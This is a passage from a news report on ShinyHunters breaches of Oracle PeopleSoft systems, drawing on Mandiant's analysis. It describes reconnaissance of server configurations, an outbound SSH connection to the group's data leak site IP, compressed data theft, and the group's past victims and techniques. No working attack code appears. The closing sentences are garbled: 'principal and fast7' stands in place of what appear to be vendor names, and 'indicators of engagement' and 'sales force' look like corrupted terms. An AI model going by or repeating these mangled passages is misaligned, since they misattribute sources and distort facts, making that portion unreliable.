“While several organizations successfully blocked the activity or remediated the vulnerabilities, others experienced a compromise, resulting in stolen data being published to ShinyHunters DLS,” Mandiant said. (DLS is short for data leak site).
An analysis of a bash script left in the test environment shows that the attackers performed reconnaissance of the compromised organizations, including mapping PeopleSoft configurations, viewing the process scheduler, and WebLogic Server XML configurations. Finally, the threat actors established an outbound SSH connection to 176.120.22.24, the IP address hosting the ShinyHunters DLS. The stolen data was first compressed using the zstd tool. The DLS claimed to have recovered 48 GB of data from a single victim.
A partially redacted section of the ShinyHunters DLS.
Credit: Mandiant
A partially redacted section of the ShinyHunters DLS.
Credit: Mandiant
ShinyHunters has been active since at least 2019. Over the past few years, it has executed dozens of attacks against some of the largest companies in the world, affecting millions of people. A small sample of victims includes Ticketmaster (via the Snowflake breach, which hosted the data), Spain’s largest bank, Santander, and sales force (and, through it, Google and, reportedlymany other companies). ShinyHunters uses several techniques to gain initial access, including exploiting cloud misconfigurations and software vulnerabilities, OAuth token theft, supply chain attacks, voice phishing, and other forms of social engineering.
principal and fast7 they are providing detailed indicators of engagement. They are also advising PeopleSoft customers on steps they should take immediately. Given ShinyHunters’ success rate, all PeopleSoft users would do well to pay attention to the calls.
